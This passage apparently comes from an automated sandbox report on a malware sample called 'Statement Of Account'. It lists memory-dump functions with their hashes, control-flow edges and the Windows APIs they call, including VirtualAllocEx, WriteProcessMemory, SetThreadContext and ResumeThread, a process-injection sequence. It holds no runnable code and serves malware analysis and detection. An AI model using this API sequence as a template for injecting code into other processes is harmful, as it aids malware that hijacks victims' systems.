                                                                                            • Instruction ID: 7532084037750382ae910181cf28a080fa97b1926b0ecec2159e5af74770b546
                                                                                            • Opcode Fuzzy Hash: 8fcaa6ce5e042f60d22d9f6d2f999d9da1b439e08d85a981f3314ec026672651
                                                                                            • Instruction Fuzzy Hash: BE31D274600381DFE7108FA1E595B7A3FA3F788324F118066FA229B3D4CBB84999CB11
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014AA8B8 Relevance: 1.6, APIs: 1, Instructions: 85libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 719 14aa8b8-14aa8c0 721 14aa8ec 719->721 722 14aa8c2-14ab348 719->722 724 14aa8ee-14aa920 721->724 725 14aa94c-14aa9b4 721->725 726 14ab34a-14ab34d 722->726 727 14ab350-14ab37f LoadLibraryExW 722->727 726->727 730 14ab388-14ab3a5 727->730 731 14ab381-14ab387 727->731 731->730
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014AB161,00000800,00000000,00000000), ref: 014AB372
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 693bd0c65d9cc726a0d540d60e037e0ad13e66e55e6fdedbd743123c00ba7173
                                                                                            • Instruction ID: f4c2432873a3943a8fbe7b7d8cf9b94382f9151dce7bfe435500207b7eedb6f1
                                                                                            • Opcode Fuzzy Hash: 693bd0c65d9cc726a0d540d60e037e0ad13e66e55e6fdedbd743123c00ba7173
                                                                                            • Instruction Fuzzy Hash: B231E0B68043588FDB11DF9AC4407EABFF4EFA9310F46805BD495A7321C3749586CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2C38C Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 735 7a2c38c-7a2c3de 737 7a2c3e0-7a2c3ec 735->737 738 7a2c3ee-7a2c42d WriteProcessMemory 735->738 737->738 740 7a2c436-7a2c466 738->740 741 7a2c42f-7a2c435 738->741 741->740
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07A2C420
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 39bcdba326ac35eb1e3e527219f9e4102a2dbbd06c1ce7ad4e20c5351c752f08
                                                                                            • Instruction ID: dde9381d5c8438c77f36306cf071f09c58860e5aec16fda6e1ca69e5ad609956
                                                                                            • Opcode Fuzzy Hash: 39bcdba326ac35eb1e3e527219f9e4102a2dbbd06c1ce7ad4e20c5351c752f08
                                                                                            • Instruction Fuzzy Hash: FB2128B1900259DFCB14DFA9C885BDEBBF1FF88320F10842AE959A7250D7749544DBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2C390 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07A2C420
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 870f4c6fe17628fb1b83703242378d48a6841e992d32ce7ed7a84bba83912fff
                                                                                            • Instruction ID: 9af201fff4ebdd41bcf9ccb133bb68cd7147334b647e41df9c11c9addac9b061
                                                                                            • Opcode Fuzzy Hash: 870f4c6fe17628fb1b83703242378d48a6841e992d32ce7ed7a84bba83912fff
                                                                                            • Instruction Fuzzy Hash: B72139B19003599FCB10DFA9C885BEEBBF5FF88320F108429E959A7250C7789944DBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014AD358 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 1acd0f640b0ed60ee35b00e40ff0a288134fe924a74ceba5b7f047b4de830e01
                                                                                            • Instruction ID: a2d4a67f21f39983e0199451498af988da79656b3f08cee3fe7a03c589e2675c
                                                                                            • Opcode Fuzzy Hash: 1acd0f640b0ed60ee35b00e40ff0a288134fe924a74ceba5b7f047b4de830e01
                                                                                            • Instruction Fuzzy Hash: 6121E4B5D00219DFDB10CF99D584ADEBBF4FB48324F14841AE954A7350D378A950CF64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2C480 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07A2C500
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 888f99329797d91d21534a7779f736fb53f3b1b3806c629a08217d8bfa885889
                                                                                            • Instruction ID: 7416d7c1174d1efeb050544e3b28f2d5c6a9822125a7a0d62d8b84681baaaad0
                                                                                            • Opcode Fuzzy Hash: 888f99329797d91d21534a7779f736fb53f3b1b3806c629a08217d8bfa885889
                                                                                            • Instruction Fuzzy Hash: A42139B1C003599FCB10DFAAC845AEEFBF5FF48320F108429E559A7250C7749544DBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2C47C Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07A2C500
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 43fbe564b5048f1bbd6c6d84ec84ce8557013e617e862763e876b1b469fcdfe3
                                                                                            • Instruction ID: 701aae447d684f3e57f0b47fba321e38769e48af04b41d44b868ce14994e8be2
                                                                                            • Opcode Fuzzy Hash: 43fbe564b5048f1bbd6c6d84ec84ce8557013e617e862763e876b1b469fcdfe3
                                                                                            • Instruction Fuzzy Hash: 692137B1D002599FCB10DFA9C984AEEFBF1FF88320F10842AE559A7250C7389955DBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2BDBB Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A2BE3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: f10dd92f91c86bbc033fbbce133a94c92096b7d3520eff3e31f0232983941503
                                                                                            • Instruction ID: 328d0a03b58c48200195fce819d5ff189f34f652d0ac77ac20642bc03481ed0f
                                                                                            • Opcode Fuzzy Hash: f10dd92f91c86bbc033fbbce133a94c92096b7d3520eff3e31f0232983941503
                                                                                            • Instruction Fuzzy Hash: FC2168B1D002198FDB10CFA9C484BEEBBF1EF88314F14842AD559A7250D7389A85CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2BDC0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A2BE3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 176dfaa70cda1544c135adfb21b4dc34c852ce6109f1b1e247ab6953672d1dba
                                                                                            • Instruction ID: caeb500ea9c9adc55139ebeb746fe02d083c9e12d2b0d47ded96194cb11d73b4
                                                                                            • Opcode Fuzzy Hash: 176dfaa70cda1544c135adfb21b4dc34c852ce6109f1b1e247ab6953672d1dba
                                                                                            • Instruction Fuzzy Hash: 552138B19003199FDB10DFAAC485BEEBBF4EF88324F148429D559A7240D7789945CFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014AD360 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: f1fe51dc6f4cee66c35f683d49eebca06dec64a108d6e55d71d69b77b1679b09
                                                                                            • Instruction ID: 291cc5bbb81e5db78a8fc6fa47ad6a31795ef64359ea8c278b44f5192eba5df6
                                                                                            • Opcode Fuzzy Hash: f1fe51dc6f4cee66c35f683d49eebca06dec64a108d6e55d71d69b77b1679b09
                                                                                            • Instruction Fuzzy Hash: C021E3B5D002089FDB10CF9AD984ADEBBF4EB48310F14801AE954A7350C374A940CFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014AA8D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014AB161,00000800,00000000,00000000), ref: 014AB372
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 6c951d6e930bae83a8f422d30601a8c3b21ea2428734130718d7ab1bf4f883d3
                                                                                            • Instruction ID: 1394541de3371c2ea53afabb2daa47e4c47223083b9054499464744bd985c3cc
                                                                                            • Opcode Fuzzy Hash: 6c951d6e930bae83a8f422d30601a8c3b21ea2428734130718d7ab1bf4f883d3
                                                                                            • Instruction Fuzzy Hash: 1F1112B69003489FDB10CF9AC444ADEFBF4EB98310F50842AE959A7220C375A645CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014AB300 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014AB161,00000800,00000000,00000000), ref: 014AB372
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 32a0c841fdb60f05d084b71f218a53db4f3a0d6f2543da09668becc258c5c50a
                                                                                            • Instruction ID: 4bfea7aafe5733933ab57e0fcf03b157f12a2bdcca4f2a4854b596d05becf8c4
                                                                                            • Opcode Fuzzy Hash: 32a0c841fdb60f05d084b71f218a53db4f3a0d6f2543da09668becc258c5c50a
                                                                                            • Instruction Fuzzy Hash: 301156B6C003098FDB10CFAAC444ADEFFF4EB58310F11802AD919A7220C375A544CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2C2CC Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07A2C33E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: dc9a7c2491ef366a40935dbdfd103b695c1607123007953565248e78cdbbdcca
                                                                                            • Instruction ID: 373df601e0dedb725997be25c98526902fcb95e0784fda47c897bacbed652b10
                                                                                            • Opcode Fuzzy Hash: dc9a7c2491ef366a40935dbdfd103b695c1607123007953565248e78cdbbdcca
                                                                                            • Instruction Fuzzy Hash: 671167B29002498FDB14DFA9C844BDFFBF1EF88324F248819E569A7250C7359544CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2C2D0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07A2C33E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: b1e55282c4c99f2f4a540357f3f4228a067267b333cc6fc99f5013ea046b470f
                                                                                            • Instruction ID: 2ba67198daf1f27b1376e3095b236ddcd475ae29dab825a893a39782dedff98b
                                                                                            • Opcode Fuzzy Hash: b1e55282c4c99f2f4a540357f3f4228a067267b333cc6fc99f5013ea046b470f
                                                                                            • Instruction Fuzzy Hash: FC1167B29002499FCB14DFAAC844BDEFFF5EF88324F108819E559A7250C735A544CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2BD08 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ResumeThread.KERNEL32(EC8B5505), ref: 07A2BD72
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 4078315c66f0efda561ad0db34cb29b5ca7acd1013d7606b144176b1cdba96bd
                                                                                            • Instruction ID: af2c78aaad44471ea0bc6d03382542a36c9cf3b7f7cd6b77ad096acc6d4bab54
                                                                                            • Opcode Fuzzy Hash: 4078315c66f0efda561ad0db34cb29b5ca7acd1013d7606b144176b1cdba96bd
                                                                                            • Instruction Fuzzy Hash: C41146B1D002588FCB10DFAAC4447DEFBF5AF88324F24841AD459A7260C735A545CFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2BD10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ResumeThread.KERNEL32(EC8B5505), ref: 07A2BD72
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 7c4e667c8049378f75d019337929c6f00753dde30c45980a95704894da439829
                                                                                            • Instruction ID: fe829537d7d9fca1f360720380e1243c06e7eeede35abfe1d52b26b7494edfef
                                                                                            • Opcode Fuzzy Hash: 7c4e667c8049378f75d019337929c6f00753dde30c45980a95704894da439829
                                                                                            • Instruction Fuzzy Hash: 1D1136B1D002598FCB20DFAAC445BDEFBF4EF88324F248429D459A7250CB75A945CFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014AB080 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 014AB0E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 6ea91b94a4e7de973cd16eb731f6f442f0c3bc7a4ad4d36737cdb165be5d33dc
                                                                                            • Instruction ID: c7c3bb4086149dbbe2daf2a37affe179a0dc34612d7e046def9d280751bf1265
                                                                                            • Opcode Fuzzy Hash: 6ea91b94a4e7de973cd16eb731f6f442f0c3bc7a4ad4d36737cdb165be5d33dc
                                                                                            • Instruction Fuzzy Hash: 5A110FB5C003498FDB20DF9AC844ADEFBF4EB88224F11842AD869A7210C375A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0116D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1700201145.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_116d000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b9e4a4df5eeb44078d602e1fa66ae9d43dd8bb6284c3d7a19a87ac4e80ed555b
                                                                                            • Instruction ID: 1c632965c39b1f077a0c3aa035d50c9abf700ec86d557747e8f0048a32ab7032
                                                                                            • Opcode Fuzzy Hash: b9e4a4df5eeb44078d602e1fa66ae9d43dd8bb6284c3d7a19a87ac4e80ed555b
                                                                                            • Instruction Fuzzy Hash: 09214871200244DFDF09DF48E9C0B66BF69FB98314F20C169D9494B656C337E866C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0117D01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1700267326.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_117d000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d52e14104b2f5de31017a0ec613025f148f74b2b57df155f3709efd3170a7edb
                                                                                            • Instruction ID: 74ddeea21b29ccdc29ee3c633c88ff866cf9656c44c7023947a2cc061818e77a
                                                                                            • Opcode Fuzzy Hash: d52e14104b2f5de31017a0ec613025f148f74b2b57df155f3709efd3170a7edb
                                                                                            • Instruction Fuzzy Hash: 48210071604208DFCF1ADF58E984B26BBB5EF88314F20C56DD80A4B356C33AD446CA62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0117D006 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1700267326.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_117d000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3405bb572ff0492d07265cced3d444e2f338e87f9e8f9637d989612aaacbc22b
                                                                                            • Instruction ID: af3fa37d25840fc325edff0a7a46a104e6d391e524de78b1e5a1ec60984189a0
                                                                                            • Opcode Fuzzy Hash: 3405bb572ff0492d07265cced3d444e2f338e87f9e8f9637d989612aaacbc22b
                                                                                            • Instruction Fuzzy Hash: 0521DE355083848FCB07CF24D990B15BF71EF46214F28C1EAD8498F2A3C33A980ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0116D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1700201145.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_116d000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction ID: 47f4888a9b7423d3e98ac00e61432107adc361a1c2c63ff872094718f4ea1aea
                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction Fuzzy Hash: 1311DF72504240CFDF06CF44D5C4B56BF71FB94324F24C2A9D9490B656C33AE86ACBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0116D731 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1700201145.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_116d000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ca0fdd31ab993dbee8afa6afe91f68e3b247a19d6ba16cc3eeaccec01dfb6c64
                                                                                            • Instruction ID: 99d03b7146964dbac468f9d95f97dc5d0179876d27825292f48c67ff45752da9
                                                                                            • Opcode Fuzzy Hash: ca0fdd31ab993dbee8afa6afe91f68e3b247a19d6ba16cc3eeaccec01dfb6c64
                                                                                            • Instruction Fuzzy Hash: AA01F7312087849AEB194AA9DD84767FF9CEF40328F18C429ED494A192C37E9840C6B3
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0116D730 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1700201145.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_116d000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 169eed7685aa384efd8f4126b9f229d7133a48bbd5e8a16ca352dbad7dc6192c
                                                                                            • Instruction ID: ba98aaad7572b4ae2606528cafc1f094cf6a93abbe65ae883ccdf4184abc45da
                                                                                            • Opcode Fuzzy Hash: 169eed7685aa384efd8f4126b9f229d7133a48bbd5e8a16ca352dbad7dc6192c
                                                                                            • Instruction Fuzzy Hash: 8FF0C2711047849AEB158A1ADC84BA2FFACEB80738F18C45AED480E282C3799840CAB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 07A22838 Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: T+-q$[V~*$]\`
                                                                                            • API String ID: 0-3978741314
                                                                                            • Opcode ID: dba6815c0b7064f671ba4abe664713d50221fec43adc8c479276e945c2220a59
                                                                                            • Instruction ID: 3dd7b6374227041c6a2c7ed4d338de59169f3a93dc85cf0c5d6754c01479b781
                                                                                            • Opcode Fuzzy Hash: dba6815c0b7064f671ba4abe664713d50221fec43adc8c479276e945c2220a59
                                                                                            • Instruction Fuzzy Hash: CEB12AB0E152199BCB08CFAAD9809AEFBF2BF89300F14D566E815F7254D7309902DF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2B4E8 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 25002fd6f590b6b5248cbea1b505c7d23f53f712bb55360b2cecca56d77f15df
                                                                                            • Instruction ID: 1b9833a850a3f82cfc237b9a61e714ced66e4c97d2853fa666b17791b2655d15
                                                                                            • Opcode Fuzzy Hash: 25002fd6f590b6b5248cbea1b505c7d23f53f712bb55360b2cecca56d77f15df
                                                                                            • Instruction Fuzzy Hash: BAE10AB4E001198FDB14DFA9C5809AEFBB2FF89304F248169E415AB356DB35AD42CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A29478 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
